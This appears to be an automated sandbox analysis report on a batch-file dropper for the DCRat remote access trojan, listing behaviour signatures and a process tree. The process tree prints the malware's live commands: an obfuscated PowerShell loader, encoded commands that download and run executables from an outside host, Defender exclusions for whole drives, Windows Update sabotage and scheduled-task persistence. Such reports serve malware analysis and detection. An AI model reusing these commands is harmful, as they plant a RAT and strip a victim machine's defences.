Analysis
-
max time kernel
1799s -
max time network
1800s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
24-08-2022 19:11
General
-
Target
BloxPredictor.bat
-
Size
23KB
-
MD5
e2553d84671dfa262938be551a620736
-
SHA1
6ce4843bf3262dc9cfd79a6b0aa26ff37b9f9dc0
-
SHA256
18ef1ace42ffd61934cbe66b9bd10c2ff14531f2602e66ce46a12c60d7a76f12
-
SHA512
49af6d4816f48a08588c45b31981d1da4e92365df13a57b40876561beb486ae5886b811575cd6cc45272c3903d49cb8818a780f449790a9fce5b90edddfa5400
-
SSDEEP
384:3S9YdseW63HBsPRtn9SXAiEZD4z7PwDjTqF+g/yv4iS9lKEHLtxL:iarW6xs3vD4fw/0+gKq1/L
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies security service 2 TTPs 5 IoCs
-
Modifies system executable filetype association 2 TTPs 7 IoCs
-
Process spawned unexpected child process 36 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
DCRat payload 8 IoCs
Detects payload of DCRat, commonly dropped by NSIS installers.
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 39 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Registers COM server for autorun 1 TTPs 64 IoCs
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 38 IoCs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 19 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 36 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies Internet Explorer settings 1 TTPs 10 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 8 IoCs
-
Suspicious use of SendNotifyMessage 8 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵
-
C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe"BloxPredictor.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $DLLWa = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat').Split([Environment]::NewLine);foreach ($GFBRS in $DLLWa) { if ($GFBRS.StartsWith(':: ')) { $WnSPY = $GFBRS.Substring(3); break; }; };$wQnVi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($WnSPY);$pobYD = New-Object System.Security.Cryptography.AesManaged;$pobYD.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pobYD.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pobYD.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O6WE67Z4EmIsT4ME4ungkdGa7Nqmh/8dccqvu392fKc=');$pobYD.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pdUC7Oyof7lpMW6QXJEGxA==');$gfOyK = $pobYD.CreateDecryptor();$wQnVi = $gfOyK.TransformFinalBlock($wQnVi, 0, $wQnVi.Length);$gfOyK.Dispose();$pobYD.Dispose();$fbEqc = New-Object System.IO.MemoryStream(, $wQnVi);$ipvmr = New-Object System.IO.MemoryStream;$NoLFc = New-Object System.IO.Compression.GZipStream($fbEqc, [IO.Compression.CompressionMode]::Decompress);$NoLFc.CopyTo($ipvmr);$NoLFc.Dispose();$fbEqc.Dispose();$ipvmr.Dispose();$wQnVi = $ipvmr.ToArray();$vqlpa = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($wQnVi);$ctVAv = $vqlpa.EntryPoint;$ctVAv.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAawBzACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHMAdgBlACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBNACAALwAgAFYAcABzACAAcwB1AHAAcABvAHIAdABlAGQAIQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAbAB4AGsAIwA+ADsAIgA7ADwAIwBmAHYAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAcABpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAegBnACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AbAB1AGMAaQBmAGUAcgA2ADEALwBsAGEAcwB0AHQAZQBzAHQALwByAGEAdwAvADcAMgBmADYAOAA1ADQAMQBhAGEANQA3AGIANABhAGIAOQBkAGQANQAxADAAYQAyADIAZQBlAGQAZgBiADEAYgBkADEANQAxADYAZgAxAGEALwBlAGIALgBlAHgAZQAnACwAIAA8ACMAYwByAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBnAHgAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB2AHEAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAG4AdABpAFYATQBQAHIAbwB0AGUAYwB0AG8AcgAuAGUAeABlACcAKQApADwAIwBpAHcAcAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AbAB1AGMAaQBmAGUAcgA2ADEALwBsAGEAcwB0AHQAZQBzAHQALwByAGEAdwAvADcAMgBmADYAOAA1ADQAMQBhAGEANQA3AGIANABhAGIAOQBkAGQANQAxADAAYQAyADIAZQBlAGQAZgBiADEAYgBkADEANQAxADYAZgAxAGEALwBtAGkAbQBpAG0AaQAuAGUAeABlACcALAAgADwAIwByAHMAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAcABpACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAaQBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAbgB0AGkAVgBwAHMAUAByAG8AdABlAGMAdABvAHIALgBlAHgAZQAnACkAKQA8ACMAZABxAGQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaABkAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGEAbQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAbgB0AGkAVgBNAFAAcgBvAHQAZQBjAHQAbwByAC4AZQB4AGUAJwApADwAIwB4AGQAdAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAGMAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAawBmAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQQBuAHQAaQBWAHAAcwBQAHIAbwB0AGUAYwB0AG8AcgAuAGUAeABlACcAKQA8ACMAdgBqAGwAIwA+AA=="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#sve#>[System.Windows.Forms.MessageBox]::Show('No VM / Vps supported!','','OK','Error')<#lxk#>;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\AntiVMProtector.exe"C:\Users\Admin\AppData\Local\Temp\AntiVMProtector.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComagentServerreviewNet\w5i86E.vbe"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ComagentServerreviewNet\uiaSIuIHGvkMcNGj6d.bat" "6⤵
- Suspicious use of WriteProcessMemory
-
C:\ComagentServerreviewNet\brokerHostmonitor.exe"C:\ComagentServerreviewNet\brokerHostmonitor.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ComagentServerreviewNet/'8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QuRhIyamyW.bat"8⤵
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵
-
C:\Recovery\WindowsRE\AntiVpsProtector.exe"C:\Recovery\WindowsRE\AntiVpsProtector.exe"9⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ec957890-4e66-4b3e-ac52-6c36aa1ca668.vbs"10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a00928f2-db5a-4f26-b503-f25a9366b4ee.vbs"10⤵
-
C:\Users\Admin\AppData\Local\Temp\AntiVpsProtector.exe"C:\Users\Admin\AppData\Local\Temp\AntiVpsProtector.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeAB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBuAGgAcQBrACMAPgAgAEAAKAAgADwAIwBtAHcAdAAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaQBqAGEAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAbABkAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgBlAGcAIwA+AA=="5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f6⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAZQBrACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAGMAaAByAC4AZQB4AGUAIgAnACkAIAA8ACMAawBmAHEAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBpAGYAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBiAHIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBHAE4AQwAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGsAdgBrAHUAIwA+ADsA"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineGNC"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineGNC"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /c y /n /d y /t 14⤵
-
C:\Windows\system32\attrib.exeattrib -h -s "C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe"4⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"1⤵
- Modifies system executable filetype association
- Registers COM server for autorun
- Checks processor information in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" /update /restart2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe /update /restart /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode3⤵
- Modifies system executable filetype association
- Executes dropped EXE
- Registers COM server for autorun
- Checks computer location settings
- Adds Run key to start application
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe"4⤵
- Executes dropped EXE
- Registers COM server for autorun
- Loads dropped DLL
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe/updateInstalled /background4⤵
- Modifies system executable filetype association
- Executes dropped EXE
- Registers COM server for autorun
- Checks computer location settings
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
